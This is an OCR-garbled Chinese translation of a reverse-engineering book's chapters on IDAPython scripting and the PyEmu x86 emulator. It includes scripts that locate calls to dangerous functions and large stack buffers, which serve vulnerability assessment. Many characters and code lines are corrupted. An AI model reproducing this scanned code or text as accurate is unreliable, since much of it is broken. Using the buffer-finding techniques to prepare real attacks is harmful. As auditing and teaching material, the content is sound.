IDAPython 能 够 访问 所 有 的 IDC 函数 ， 我 们 只 介绍 一 些 会 马上 用 到 ， 为 之 后 的 
IDAPython 

脚本 编写 做 基础 。IDC 总 共有 100 多 个 函数 ， 有 兴趣 的 可 以 研究 研究 。 


11.2.1 常用 函数 


以 下 的 函数 都 是 在 编写 脚本 的 时 候 经 常用 到 的 。 
ScreenEA( ) 


获取 IDA 调试 窗口 中 ， 光 标 指 向 代码 的 地 址 。 通 过 这 个 函数 ， 我 们 就 能 够 从 一 个 已 
知 的 点 运行 我 们 的 脚本 。 


GetInputFileMD5( ) 


返回 IDA 加 载 的 二 进 制 文件 的 MDS 值 ， 通 过 这 个 值 能 够 判断 一 个 文件 的 不 同 版 本 
是 否 有 改变 。 


11.2.2 E 


在 IDA 中 二 进 制 文件 被 分 成 了 不 同 的 段 ， 这 些 段 根据 功能 分 成 了 不 同 的 类 型 ( 
CODE, DATA, BSS, STACK, CONST,XTRN) 。 以 下 的 画 数 用 于 分 析 获 得 各 种 段 信 


FirstSeg() 

访问 程序 中 的 第 一 个 段 。 
NextSeg() 

访问 下 一 个 段 ， 如 果 没有 就 返回 BADADDR。 
SegByName( string SegmentName ) 


通过 段 名 字 返 回 段 基 址 ， 举 个 例子 ， 如 果 调 用 .text 作为 参数 ， 就 会 返回 程序 中 代码 
段 的 开始 位 置 。 


SegEnd( long Address ) 
通过 段 内 的 某 个 地 址 ， 获 得 段 尾 的 地 址 。 
SegStart( long Address ) 
通过 段 内 的 某 个 地 址 ， 获 得 段 头 的 地 址 。 
SegName( long Address ) 
通过 段 内 的 某 个 地 址 ， 获 得 段 名 。 


Segments( ) 
返回 目标 程序 中 的 所 有 段 的 开始 地 址 。 


11.2.3 HA 
(82r ERRANA, ERRATA, SWAB PS WE BR 2. 
下 面 的 函数 对 于 义理 函数 非常 有 用 。 

Functions( long StartAddress, long EndAddress ) 

返回 一 个 列表 ， 包 含 了 从 StartAddress 到 EndAddress 之 间 的 所 有 函数 。 
Chunks( long FunctionAddress ) 


一 个 列表 ， 包 含 函数 片段 。 每 个 列表 项 都 是 一 个 元 组 (chunk start, chunk 
a 


LocByName( string FunctionName ) 
WAZ Rew. 
GetFuncOffset( long Address ) 


通过 任意 一 个 地 址 ， 然 后 得 到 这 个 地 址 所 属 的 荔 数 名 ， 以 及 给 定 地 址 和 图 数 的 相对 
位 移 。 然后 把 这 些 信息 组 成 字符 串 以 "名 字 + 位 移 " 的 形式 返回 。 


GetFunctionName( long Address ) 


一 个 地 址 ， 返 回 这 个 地 址 所 属 的 图 数 。 


11.2.4 交叉 引用 


找 出 代码 和 数据 的 交叉 引用 ， 在 分 析 文 件 的 执行 流程 时 很 重要 ， 尤 其 是 当 我 们 分 析 
感 兴 趣 的 代码 块 的 时 候 ， 盲 目的 查找 无 意义 字符 会 让 你 有 一 种 想 死 的 冲动 ， 这 也 是 
为 什么 IDA 依然 会 成 为 逆向 工程 的 王者 的 原因 。IDAPython tek TAERAA F 
各 种 交叉 引用 。 最 常 用 的 就 是 下 面 几 种 。 


CodeRefsTo( long Address, bool Flow ) 


一 个 列表 ， 告 诉 我 们 Address 处 代码 被 什么 地 方 引用 了 ，Flow 告诉 
人 是 否 要 跟踪 这 些 代码 。 


CodeRefsFrom( long Address, bool Flow ) 
一 个 列表 ， 告 诉 我 们 Address 地 址 上 的 代码 引用 何 处 的 代码 。 
DataRefsTo( long Address ) 


一 个 列表 ， 告 诉 我 们 Address 处 数据 被 什么 地 方 引 用 了 。 常 用 于 跟踪 全 局 变 
量 。 


DataRefsFrom( long Address ) 


返回 一 个 列表 ， 告 诉 我 们 Address 地 址 上 的 代码 引用 何 处 的 数据 。 


11.2.5 Debugger Hooks 


Debugger Hook 是 IDAPython 提供 的 另 一 个 非常 酷 的 功能 ， 用 于 Hook 住 IDA 内 
部 的 调 试 器 ， 同 时 处 理 各 种 调试 事件 。 虽 然 IDA 一 般 不 用 于 调试 任务 ， 但 是 当 需 
要 动态 调试 的 时 候 ， 调 用 IDA 内 部 调试 器 还 是 比 外 部 的 会 方便 很 多 。 之 后 我 们 会 
用 debugger hooks 创建 一 个 代码 覆盖 率 统计 工具 。 使 用 debugger hook 之 前 ， 先 
要 瞳 你 一 个 一 个 hook 类 然后 在 类 里 头 EL SMTA RHR, 


class DbgHook(DBG Hooks): 

# Event handler for when the process starts 

def dbg process start(self, pid, tid, ea, name, base, size) 
return 

4 Event handler for process exit 

def dbg process exit(self, pid, tid, ea, code): 
return 

# Event handler for when a shared library gets loaded def 

dbg library load(self, pid, tid, ea, name, base, size): 
return 

4 Breakpoint handler 

def dbg bpt(self, tid, ea): 
return 


这 个 类 包含 了 我 们 在 创建 调试 脚本 时 ， 会 经 常用 到 的 几 个 调试 事件 处 理 函 数 。 安 装 
hook 的 方式 如 下 : 


debugger = DbgHook() 
debugger .hook( ) 


现在 运行 调试 器 ，hook 会 捕捉 所 有 的 调试 事件 ， 这 样 就 能 非常 精确 的 控制 IDA 调 
试 器 。 下 面 的 函数 在 调试 的 时 候 非 常 有 用 


AddBpt( long Address ) 

在 指定 的 地 点 设置 软件 断 点 。 

GetBptQty() 

返回 当前 设置 的 断 点 数量 。 

GetRegValue( string Register ) 

通过 寄存 器 名 获得 寄存 器 值 。 

SetRegValue( long Value, string Register ) 
设 定 寄存 器 的 值 。 


11.3 脚本 例子 


我 们 先 创 建 一 些 在 逆向 时 候 会 经 常用 到 的 脚本 。 之 后 ， 大 家 可 以 在 此 基础 上 扩展 它 
们 ， 进 一 步 完成 功能 更 强大 ， 针 对 性 更 强 的 脚步 。 接 下 来 的 脚本 将 展示 如 何 收集 危 
SAAMI 信息 ， 以 及 用 IDA debugger hook 监视 图 数 的 代码 覆盖 率 ， 还 有 
所 有 男 数 的 栈 的 大 小 。 


11.3.1 收集 危险 函数 的 调用 信息 


当 一 个 开发 者 在 寻找 软件 漏洞 bug 的 时 候 ， 首 先 会 找 一 些 常用 的 而 且 容 易 被 错误 使 
用 的 函数 。 上 比如 危险 的 字符 捉 拷 贝 函 数 (strcpy, sprintf), ATH n E92 (memopy) 
等 。 在 我 们 审核 程序 的 时 候 ， 需 要 很 简单 的 就 找 出 这 些 函 数 。 下 面 的 脚本 ， 将 跟踪 
这 些 危险 的 函数 ， 找 出 调 用 它们 的 地 方 ， 之 后 在 这 些 地 方 的 背景 色 设 置 成 不 同 的 颜 
色 ， 我 们 在 IDA 窗口 中 就 能 很 方 便 的 看 出 来 。 


#cross_ref.py 
from idaapi import * 
danger funcs = ["strcpy", "sprintf", "strncpy" ] 
for func in danger_funcs: 
addr = LocByName( func ) 
if addr !- BADADDR: 
# Grab the cross-references to this address 
cross refs = CodeRefsTo( addr, © ) 
print "Cross References to %s" % func 
print "------------------------------- N 
for ref in cross refs: 
print "%08x" 96 ref 
4 Color the call RED 
SetColor( ref, CIC ITEM, 0x0000ff) 


我 们 先 获得 危险 函数 的 地 址 ， 然 后 测试 这 些 地 址 的 有 效 性 。 接 着 获得 这 些 函 数 的 交 
叉 引 用 信息 ， 确 认 什 么 地 方 调用 了 它们 ， 最 后 把 它们 打印 出 来 ， 并 在 IDA 中 给 它们 
上 色 。 用 之 前 编译 好 的 war-ftpd.exe 做 测 斌 目标， 将 看 到 如 下 的 输出 : 


Cross References to sprintf 
004043df 
00404408 
004044f9 
00404810 
00404851 
00404896 
004052cc 
0040560d 
0040565e 
004057bd 
004058d7 


Listing 11-1: cross ref.py 的 输出 


上 面 这 些 被 列 出 来 的 地 址 都 是 sprintf 被 调用 的 地 方 ， 如 果 在 IDA 中 浏览 这 些 地 方 
会 看 到 它们 都 被 上 了 色 ， 如 图 11-3。 







loc 528299: 
mou eax, [ebp*arg 8] 

lea ecx, [ebp+Dest] 

push eax 

offset aGoonlineCreate ; "GoOünline(): Create(%d) failed." 
ecx ; Dest 












esp, BCh 
lea ecx, [ebp+Dest] 






mou eax, dword 44AEC4 
push ecx 

mou esi, [eax] 

push 2 





ecx, eax 
dword ptr [esi+4Ch] 





Figure 11-3: sprintf 调用 通过 cross ref.py 上 色 之 后 


11.3.2 函数 覆盖 率 


在 执行 动态 分 析 的 时 候 ， 明 白 我 们 真正 进行 的 操作 是 由 什么 代码 执行 的 ， 非 常 重 
要 。 无 论 是 测试 网 络 程 序 发 送 一 个 数据 包 ， 还 是 使 用 文档 阅读 器 代 开 一 份 文档 ， 代 
码 覆 盖 率 都 能 帮 我 们 很 好 的 了 解 ， 程 序 做 了 人 什么。 下面， 我 们 将 用 IDAPython 获 
取 目 标 程 序 的 所 有 函数 ， 并 且 在 再 每 个 函数 的 开始 处 都 设置 好 断 点 。 之 后 运行 IDA 
调试 器 ，debugger hook 会 把 每 一 次 断 点 触发 的 情况 通知 我 们 。 


#func_coverage. py 
from idaapi import * 
class FuncCoverage(DBG_Hooks): 
# Our breakpoint handler 
def dbg_bpt(self, tid, ea): 
print "[*] Hit: Ox%08x" % ea 
return 
# Add our function coverage debugger hook 
debugger = FuncCoverage() 
debugger .hook( ) 
current addr - ScreenEA() 
# Find all functions and add breakpoints 
for function in Functions(SegStart( current addr ), SegEnd( current 
AddBpt( function ) 
SetBptAttr( function, BPTATTR FLAGS, 0x0 ) 
num breakpoints - GetBptQty() 
print "[*] Set %d breakpoints." % num breakpoints 


| _ a 


第 一 步 安装 debugger hook ， 调 试 事件 发 生 的 时 候 就 会 调用 它 。 接 着 循环 获取 所 有 
函数 的 地 址 ， 在 每 个 地 址 上 设置 断 点 。SetBptAttr 告诉 调试 器 ， 遇 到 断 点 后 ， 不 用 
停 下 来 ， 继 续 执行 ; 如 果 没 有 这 样 做 ， 那 我 们 就 得 手工 恢复 调试 器 了 ， 不 累 死 也 得 
烦 死 。 最 后 一 部 就 是 打 印 出 所 有 断 点 的 数量 。 当 一 个 断 点 被 触发 的 时 候 ， 
debugger hook 里 的 断 点 处 理 画 数 就 会 打 印 出 当前 的 地 址 ， 这 个 地 址 由 变量 ea 提 
供 ， 它 引用 当前 EIP 寄存 器 的 值 。 现 在 运行 调试 器 ( 热 键 F9) ， 你 将 清楚 的 看 到 
什么 画 数 被 执行 了 ， 以 及 它们 执行 的 顺序 。 





11.3.3 计算 栈 大 小 


有 时 当 我 们 对 一 个 程序 进行 漏洞 评估 的 时 候 ， 了 人 解 画 数 调 用 的 栈 的 大 小 是 很 重要 
的 。 我 们 必须 明确 的 知道 ， 传 递 给 函数 的 是 一 个 指针 还 是 申请 好 的 栈 缓冲 区 ， 如 果 
是 后 者 ， 我 们 就 会 很 感 兴趣 ,能 传递 多 少数 据 给 它 ,要 知道 浴 出 可 是 个 精 活 ， 空 间 太 
小 了 尽管 有 漏洞 也 很 难 利 用 。 下 面 我 们 用 一 段 简短 的 代码 完成 这 项 任务 : MABE 
中 所 有 的 画 数 ， 然 后 收集 这 些 函 数 的 栈 信息 ， 如 果 栈 缓冲 区 大 小 符合 我 们 的 要 求 ， 
就 打印 出 来 。 将 这 些 和 前 面 的 脚本 合并 起 来 ， 我 们 就 能 在 调试 程序 的 时 候 ， 很 好 的 
跟踪 调试 感 尖 趣 的 函数 。 


Zstack calc.py 
from idaapi import * 
var size threshold - 16 current address - ScreenEA() 
for function in Functions(SegStart(current address), SegEnd(current 
stack frame - GetFrame( function ) 
frame counter = 0 
prev count = -1 
frame size - GetStrucSize( stack frame ) 
while frame counter « frame size: 
stack var - GetMemberName( stack frame, frame counter ) 
if stack var !- ""; 
if prev count !- -1: 
distance - frame counter - prev distance 
if distance »- var size threshold: 
print "[*] Function: %s -> Stack Variable: %s (%d I 
else: 
prev count - frame counter 
prev member - stack var 
try: 
frame counter = frame counter + GetMemberSize(stacl 
except: 
frame counter += 1 
else: 
frame counter += 1 


= — 


我 们 设置 了 一 个 闵 值 ， 用 来 衡量 一 个 栈 变量 的 大 小 是 不 适合 我 们 的 需求 ; 这 里 设置 
成 16 个 字 节 ， 不 过 大 家 也 可 以 实验 下 各 种 不 同 的 大 小 看 看 得 出 的 结果 。 首 先 ， 循 
环 获取 所 有 HKR, EIENAAR R. AMA GetStrucSize 计算 出 栈 框 
架 的 大 小 。 接 着 循环 获取 栈 中 的 变量 。 如 果 找 到 变量 ， 就 将 当前 变量 的 位 置 减 去 前 
一 个 变量 的 位 置 。 然 后 通过 之 间 的 差 值 计算 出 变量 占据 的 空间 大 小 。 如 果 大 小 够 

大 ， 就 打印 出 来 ， 如 果 不 够 大 ， 就 尝试 计 算 当 前 变量 的 大 小 ， 然 后 加 上 当前 的 位 

置 ， 得 到 下 一 个 变量 的 位 置 。 如 果 无 法 确认 变量 的 大 小 ， 就 在 当前 的 位 置 简单 的 加 
一 个 字 节 ， 移 动 到 下 一 个 位 置 ， 然 后 继续 循环 。 在 脚本 运行 后 ， 我 们 就 能 看 看 难道 
类 似 如 下 的 输出 。 





[*] Function: sub 1245 -> Stack Variable: var C(1024 bytes) 
[*] Function: sub 149c -» Stack Variable: Mdl (24 bytes) 
[*] Function: sub a9aa -» Stack Variable: var 14 (36 bytes) 


Listing 11-2: stack calc.py 的 输出 


现在 我 们 有 了 IDAPython 的 基础 知识 ， 同 时 也 动手 实现 了 几 个 很 容易 扩展 的 脚本 。 
这 些小 小 的 脚本 ， 将 帮 有 我 们 节省 非常 多 的 时 间 ， 在 逆向 工程 中 ， 最 事件 就 是 一 切 。 
下 一 章 让 我 们 看 一 看 IDAPython 的 实际 应 用 : PyEmu， 一 个 基于 Python 的 x86 
仿真 器 。 


12 PyEmu 


PyEmu 由 Cody Pierce(TippingPoint DVLabs team) F 2007 在 黑 帽 大 会 上 首次 公 
布 。PyEmu 是 一 个 存 Python 实现 的 IA32 仿真 器 ， 用 于 仿真 CPU 的 各 种 行为 以 
完成 不 同 的 任务 。 仿 真 器 非常 有 用 ， 比 如 在 调试 病毒 的 时 候 ， 我 们 就 不 用 真正 的 运 
行 它 ， 而 是 通过 候 真 器 欺骗 它 在 我 们 的 模拟 环境 中 运行 。 PyEmu 里 有 三 个 类 
:IDAPyEmu, PyDbgPyEmu 和 PEPyEmu 。 IDAPyEmu 用 于 在 IDA Pro 内 完成 各 
种 仿真 任务 (由 DAPython 调用 ， 详 看 第 11 章 ) ，PyDbgPyEmu 类 用 于 动态 分 
析 ， 同 时 它 人 允许 使 用 我 们 真正 的 内 存 和 寄存 器 。 


PEPyEmu 类 是 一 个 独立 的 静态 分 析 库 ， 不 需要 IDA 就 能 完成 反 汇 编 任 务 。 我 们 主 
EN 绍 


IDAPyEmu 和 PEPyEm， 剩 下 的 PyDbgPyEmu 留 给 大 家 自己 去 试验 。 下 面 先 从 
PyEmu 的 安 装 开 始 ， 接 着 深入 介绍 优 真 器 的 架构 ， 为 实际 应 用 做 好 准备 。 


12.1 zc PyEmu 


从 http://www.nostarch.com/ghpython.htm 下 载 作者 打包 好 的 文件 ， 如 果 没 有 的 同 
学 去 google code 上 下 。 

文件 下 载 好 后 ， 解 压 到 CA\PyEmu。 每 次 创建 PyEmu 脚本 的 时 候 ， 都 要 加 入 以 下 
两 行 Python 代码 : 


sys.path.append("C:\PyEmu\") 
sys.path.append("C:\PyEmu\1ib") 


接 下 来 让 我 们 输入 了 解 下 PyEmu 的 系统 架构 ， 方 便 后 面 的 脚本 编写 。 


12.2 PyEmu — X, 


PyEmu 被 划分 成 三 个 重要 的 系统 : PyCPU, PyMemory 和 PyEmu。 与 我 们 交互 最 
多 的 就 是 PyEmu 类 ， 它 再 和 PyCPU 和 PyMemoey 交互 完成 底层 的 仿真 工作 。 

当 我 们 测试 驱动 PyEmu 执行 一 个 指使 的 时 候 ， 它 就 调用 PyCPU 完成 真正 的 指 今 
操作 。PyCPU 在 进行 指令 操 作 的 时 候 ， 把 需要 的 内 存 操作 告诉 PyEmu， 由 
PyEmu 继续 调用 PyMemory 辅助 完成 整个 指 邻 的 操作 ， 最 后 由 PyEmu 将 指令 的 
结果 返回 给 调用 者 。 


接 下 来 ， 让 我 们 简短 的 了 解 下 各 个 子 系统 和 他 们 的 使 用 方法 ， 以 便 更 好 的 明白 伟大 
的 PyEmu 蔡 我 们 完成 了 什么 ， 同 时 大 家 也 能 对 实际 应 用 有 个 初 略 的 了 解 。 


12.2.1 PyCPU 


PyCPU 类 是 PyEmu 的 核心 ， 它 模拟 成 和 真实 的 CPU 一 样 。 在 仿真 的 过 程 中 ， 它 
负责 执行 指令 。 当 PyCPU 处 理 一 个 指使 的 时 候 ， 会 先 检索 指使 指针 ( 由 负责 静态 
分 析 的 IDA Pro/PEPyEmu 或 者 负责 动态 调试 的 PyDbg 获取 )， 然 后 将 指使 传递 给 
pydasm， 由 后 者 解码 成 操作 码 和 操作 对 象 。PyCPU 提供 的 独立 解码 指令 的 能 力 使 
得 PyEmu 的 跨 平 台 变 成 了 可 能 。 每 个 PyEmu 接收 到 的 指令 ， 都 有 一 个 相对 应 内 
HKR. MIF, MIS CMP EAX ,1 传 给 PyCPU， 接 着 PyCPU 就 会 调 
用 PyCPU CMP() 函 数 执 行 真 正 的 操作 ,并 从 内 存 中 检索 必要 的 值 ， 之 后 设置 CPU 
的 标志 位 ， 告 诉 程序 这 次 比较 的 结果 。 有 闪 趣 的 各 位 都 可 以 看 看 PyCPU.py， 所 有 
的 PyEmu 支持 的 指使 处 理 函 数 都 在 这 里 ， 通 过 研究 它们 可 以 明白 CPU 是 如 何 完 
成 那些 神秘 的 底层 操作 的 。 别 担心 代码 的 可 读 性 ， Cody 在 这 上 面 可 没 少 花 功 夫 。 


12.2.2 PyMemory 
PyMemor 负责 加 载 和 储存 执行 指 今 的 必要 数据 。 同 时 也 可 以 对 可 执行 程序 的 代码 


和 数 据 块 进行 映射 ， 以 便 在 优 真 器 中 访问 。 在 将 借 完 两 个 主要 类 之 后 ， 让 我 们 看 看 
核心 类 PyEmu， 以 及 相关 的 类 方法 。 


12.2.3 PyEmu 

PyEmu 负责 驱动 整个 仿真 器 的 运作 。PyEmu 类 本 身 被 设计 的 非常 轻便 和 灵活 ， 使 
SH 发 者 能 够 很 块 的 开发 出 强大 的 仿真 器 脚本 ， 而 不 用 关心 底层 操作 。 这 一 切 都 由 
PyEmu 提供 的 帮助 范 数 实现 ， 使 用 它们 能 让 我 们 的 这 个 逆向 工作 变 得 更 简单 ， 无 
论 是 操作 执行 流程 ， 改 变 寄存 器 值 还 是 更 新 内 存 等 等 。 下 面 就 来 卓 一 介绍 它们 。 


12.2.4 执行 操作 


PyEmu 的 执行 过 程 由 一 个 函数 控制 ，execute()。 原 型 如 下 : 


execute( steps=1, start-0x0, end=0x0 ) 


总 共 三 个 参数 ， 如 果 一 个 都 没有 提供 ， 就 从 PyEmu 当前 的 地 址 开始 执行 。 这 个 地 
址 也 许 是 PyDbg 的 EIP 寄存 器 指向 的 位 置 ， 也 许 是 PEPyEmu 加 载 的 可 执行 程序 
的 入 口 地 址 ， 也 许 是 IDA Pro 光标 所 处 的 位 置 。start 为 开始 执行 的 地 址 ，steps 为 
执行 的 指令 数量 ，end 为 结 束 的 地 址 。 


12.2.5 内 存 和 寄存 器 操作 


修改 和 检索 寄存 器 与 内 存 的 值 在 逆向 的 过 程 中 特别 重要 。 PyEmu 将 它们 分 成 了 4 
类 : 内 存 ， 栈 变量 (stack variables)， 栈 参数 (stack arguments)， 寄 存 器 。 内 存 操 
作 由 get memory() 和 set _ memory() 完 成 。 


get memory( address, size ) set memory( address, value, size-0 ) 


get memory(QEgZiciiilit 2 个 参数 :address 为 要 查询 的 地 址 ，size 为 要 获得 数据 的 
大 小 。 set_memoey() 负 责 写 入 数据 ，address 为 写 入 的 地 址 ，value 为 写 入 的 值 ， 
size ABA BEN 大 小 。 


B i 主要 负责 栈 框架 中 画 数 参数 和 本 地 变量 的 检 
RAN BA. 


set_stack_argument( offset, value, name="" ) 
get_stack_argument( offset=0x0, name="" ) 
set_stack_variable( offset, value, name="" ) 
get stack variable( offset=0x0, name="" ) 


set stack argument()84 offset 相对 与 ESP, FH t ANAIS ATAR. TE 
操作 的 过 程 中 可 以 提供 可 以 可 选 的 名 字 。get_ stack _argument() 通 过 offset 指定 的 
相对 于 ESP 的 位 移 获得 参数 值 ， 或 者 通过 指定 的 name( 前 提 是 在 

set stack argument 中 提供 了 ) 获 得 。 使 用 方式 如 下 : 


set stack argument( 0x8, 0x12345678, name="arg_0" ) get stack argur 
get stack argument( "arg 0" ) 
MH 


set_stack_variable() 和 get_stack_variable() 的 操作 也 类 似 除了 offset 是 相对 于 
EBP( 如 果 人 允 许 的 话 ) 以 外 ， 因 为 它们 负责 操作 阔 数 的 局 部 变量 。 





12.2.6 义理 函数 


义理 函数 提供 了 一 种 非常 强大 且 有 灵活 的 回调 结构 ， 用 于 观察 ， 设 置 或 者 修改 程序 的 
特定 部 分 。PyEmu 中 有 8 个 主要 你 理 琅 数 : register 处 理 画 数 , library REE, 
exception 4438pq2X, instruction 义理 函数 , opcode XH EIR, memory %4 WR, 
high-level memory 义理 函数 还 有 program counter 义理 函数 。 让 我 们 快速 的 了 解 下 
每 一 个 函数 ， 之 后 我 们 马上 要 在 用 到 它们 。 


12.2.6.1 Register 处 理 画 数 
Register Handlers 寄存 器 处 理 函 数 ， 用 于 监视 任何 寄存 器 的 改变 。 只 要 有 寄存 器 的 
2 修改 就 将 触发 Register Handlers。 安 装 方式 如 下 : 


set register handler( register, register handler function ) 
set register handler( "eax ", eax register handler ) 


RR Zi, Wee LRAT, REAT : 


def register_handler_function( emu, register, value, type ): 


4 d HER Bad fx, MARBRE PyEmu 传人 ， 第 一 个 参数 就 是 PyEmu 

实例 首 ， 接 着 是 寄存 器 名 ， 以 及 寄存 器 的 值 ，type 告诉 我 们 这 次 操作 是 读 还 是 

时 间 久 了 你 就 会 发 现 用 这 种 方式 观察 寄存 器 是 有 多 么 强大 且 方 便 ， 如 果 需 要 你 
能 在 义理 函数 里 改变 它 ilo 


12.2.6.2 ### Library % 8 EqZi 


Library handle Hk AS FEDS 9 数 ， 能 让 我 们 捕捉 所 有 的 外 部 库 调用 ， 在 它们 被 调用 进程 
Eom 它们 ， 这 样 就 能 很 方便 的 修改 外 部 库 函 数 的 调用 方式 以 及 返回 值 。 安 
装 方 式 如 下 : 


set library handler( function, library handler function ) 
set library handler( "CreateProcessA", create process handler ) 
set library handler("LoadLibraryA", loadlibrary) 


EASTER ROR : 


def library_handler_function( emu, library, address ): 


第 一 个 参数 就 是 PyEmu 的 实例 。library 7; 41298 88 V a BIER ZA, RAZ, B= 
ER 数 被 映射 在 内 存 中 的 地 址 。 


12.2.6.3 Exception «2H 


Exception Handlers i KEKA AR ENAA" EKR". PyEmu 仿真 器 
中 的 异常 会 触发 Exception Handlers 的 调用 。 当 前 PyEmu 支持 通用 保护 错误 ， 也 
就 是 说 我 们 能 够 处 理 在 模拟 器 中 的 任何 内 存 访 问 违 例 。 安 装 方式 如 下 : 


set exception handler( "GP", gp exception handler ) 


Exception FEE aR 2/40 TF : 


def gp exception handler( emu, exception, address ): 


同样 ， 第 一 个 参数 是 PyEmu Xl, exception 为 异常 代码 ，address 为 异常 发 生 的 
地 址 。 


12.2.6.4 Instruction RIE 


Instruction Handlers 1845 4^ XS Eq Xt, Es 因为 它 能 捕捉 任何 特定 的 指令 。 就 像 
Cody 在 BlackHat 说 展示 的 那样 ， 你 能 够 通过 安装 一 个 CMP 指令 的 义理 函数 ， 来 
监视 整个 程序 流 程 的 分 支 判 断 ， Md En. 


set instruction handler( instruction, instruction handler ) 
set instruction handler( "cmp", cmp instruction handler ) 


Instruction % PR Z& [e RTT: 


def cmp instruction handler( emu, instruction, opi, op2, op3 ): 


第 一 个 参数 照旧 是 PyEmu £P, instruction 则 为 被 执行 的 指令 ， 另 外 三 个 都 是 可 
能 的 运 算 对 象 。 


12.2.6.5 Opcode 义理 函数 


Opcode handlers 操作 码 处 理 画 数 和 指 倒 处理 函数 非常 相似 ， 任 何 一 个 特定 的 操作 
码 被 执 行 的 时 候 、 都 会 调用 Opcode handlers。 这 样 我 们 对 代码 的 控制 就 变 得 更 精 
确 了 。 每 一 个 指令 都 有 可 能 有 不 同 的 操作 码 这 依赖 于 它们 的 运算 对 象 ， 例 如 ， 
PUSH EAX 时 操 Ve 0x50, 而 PUSH 0x70 时 操作 码 是 0x6A， 合 起 来 整个 指 兮 
的 操作 码 就 是 0x6A70, 如 下 所 示 : 


50 PUSH EAX 
6A 70 PUSH 0x70 


它们 的 安装 方法 很 简单 : 


set opcode handler( opcode, opcode handler ) 
set opcode handler( 0x50, my push eax handler ) 
set opcode handler( 0x6A70, my push 70 handler ) 


A—-TSARE d EB EB PX MSS SETBHEBJERTESS, PSI ATUM ERE 
z 捕捉 的 范围 不 限于 单个 字 节 ， 而 可 以 是 多 这 个 字 节 ， 就 想 第 二 个 例子 一 样 。 钦 
AUR HOOF : 


def opcode handler( emu, opcode, opi, op2, op3 ): 


第 一 miens 实例 ， 后 面 不 再 累 资 。opcode 是 捕捉 到 的 操作 码 ， 剩 下 的 三 个 就 是 
指令 可 能 使 用 到 的 计算 对 象 。 


12.2.6.6 Memory ATE Eq 28 


Memory handlers 内 存 义理 函数 用 于 跟踪 特定 地 址 的 数据 访问 。 它 能 让 我 们 很 方便 
的 跟 踪 缓 冲 区 中 感 兴趣 的 数据 以 及 全 局 变量 的 改变 过 程 。 安 装 过 程 如 下 : 


set memory handler( address, memory handler ) 
set memory handler( 0x12345678, my memory handler ) 


address 简单 传 和 我 们 想 要 观察 的 内 存 地 址 ， my memory handler 就 是 我 们 的 处 
TEE 2h, EN RUR AOE : 


def memory_handler( emu, address, value, size, type ) 


第 二 个 参数 address 为 发 生 内 存 访问 的 地 址 ，value 是 被 读 取 或 者 写 人 的 数据 ， 
size 是 数 据 的 大 小 ，type 告诉 我 们 这 次 操作 读 还 是 写 。 


12.2.6.7 High-Level Memory 处 理 函 数 


High-Level Memory Handlers i21 P3 fr ERR, 很 高 级 很 强大 。 通过 安装 它们 ， 
我 们 就 能 监视 这 个 内 存 快 (HRA) 的 读 写 。 这 样 就 能 全 面 的 控制 内 存 的 访 
问 ， 是 不 是 很 那 释 。 安 装 方式 如 下 : 


set memory write handler( memory write handler ) 
set memory read handler( memory read handler ) 

set memory access handler( memory access handler ) 
set stack write handler( stack write handler ) 

set stack read handler( stack read handler ) 

set stack access handler( stack access handler ) 
set heap write handler( heap write handler ) 

set heap read handler( heap read handler ) 

set heap access handler( heap access handler ) 





所 有 的 这 些 安装 函数 只 要 简单 的 提供 一 个 义理 函数 就 可 以 了 ， 任 何 内 存 的 变动 都 会 
通知 我 们 。 人 处理 画 数 的 原型 如 下 : 


def memory write handler( emu, address ): 
def memory read handler( emu, address ): 
def memory access handler( emu, address, type ): 


memory write handler 和 memory. read handler 只 是 简单 的 接收 PyEmu 实例 和 
发 生 读 写 的 地 址 。 第 三 个 access handler 多 了 一 个 type 用 于 说 明 这 次 不 做 到 的 是 
读数 据 还 是 些 数据 。 栈 和 堆 的 处 理 画 数 和 上 面 的 一 样 ， 不 做 解说 。 


12.2.6.8 Program Counter 义理 郴 数 
The program counter handler #£5% it Bas 38pq ZA, REE UO BE He a at 
候 触 发 。 安 装 过 程 如 下 : 


set pc handler( address, pc handler ) 
set pc handler( 0x12345678, 12345678 pc handler ) 


address 为 我 们 将 要 监视 的 地 址 ， 一 旦 CPU WTE WAAR RA A BERG 
处 理 函数 的 原型 如 下 : 


def pc handler( emu, address ): 


第 二 个 参数 address 为 被 捕捉 到 的 地 址 。 


现在 我 们 已 经 讲解 完了 ，PyEmu 的 基础 知识 。 是 时 候 将 它们 用 于 实际 工作 中 了 。 
接 下 来 会 进行 两 个 实验 。 第 一 个 使 用 IDAPyEmu 在 IDA Pro 模拟 一 个 简单 的 函数 
调用 。 第 二 个 实验 使 用 PEPyEmu 解压 一 个 被 UPX 压缩 过 的 〈 伟 大 的 开源 压缩 程 
Fr) 二 进 制 文件 。 


12.3 IDAPyEmu 


我 们 的 第 一 个 例子 就 是 在 IDA Pro 分 析 程 序 的 时 候 ， 使 用 PyEmu 仿真 一 次 简单 的 
WA 调用 。 这 次 实验 的 程序 就 是 addnum.exe， 主 要 功能 就 是 从 命令 行 中 接收 两 个 
参数 ， 然 后 相 加 ， 再 输出 结果 ， 代 码 使 用 C++ 编写 ， 可 从 
http://www.nostarch.com/ghpython.htm 下 载 。 


/*addnum.cpp*/ 

#include <stdlib.h> 

#include <stdio.h> 

#include <windows.h> 

int add number( int numi, int num2 ) 


int sum; 
sum = numi + num2; 
return sum; 


int main(int argc, char* argv[]) 


int numi, num2; 

int return value; 

if( argc « 2 ) 

{ 
printf("You need to enter two numbers to add.\n"); printf(' 
return 0; 

} 

numi = atoi(argv[1]); 

num2 = atoi(argv[2]); 

return value - add number( numi, num2 ); 

printf("Sum of %d + %d = %d",num1, num2, return value ); 

return 0; 


} 
4 = z 
REP ap 9 7T EA DSR ARM, Am MHadd_numberkka jl. Feist 


add number 画 数 作为 我 们 的 仿真 对 象 ， 因 为 它 够 简单 而 且 结 果 也 很 容易 验证 ， 作 
为 我 们 使 用 PyEmu 的 起 点 是 个 不 二 选择 。 


在 深入 PyEmu 使 用 之 前 ， 让 我 们 看 看 add number 的 反 汇编 代码 。 





var 4- dword ptr -4 

# sum variable arg 0- dword ptr 8 
# int numi arg 4- dword ptr OCh 
# int num2 push ebp 

mov ebp, esp 

push ecx 

mov eax, [ebp+arg 0] 

add eax, [ebp-«arg 4] 

mov [ebp-var 4], eax 

mov eax, [ebp-var. 4] 

mov esp, ebp 

pop ebp retn 


Listing 12-1: add. number 的 反 汇 编 代 码 


var 4，arg_0，arg_4 分 别 是 参数 在 栈 中 的 位 置 ， 从 C++ 的 反 汇 编 代 码 中 可 以 清楚 
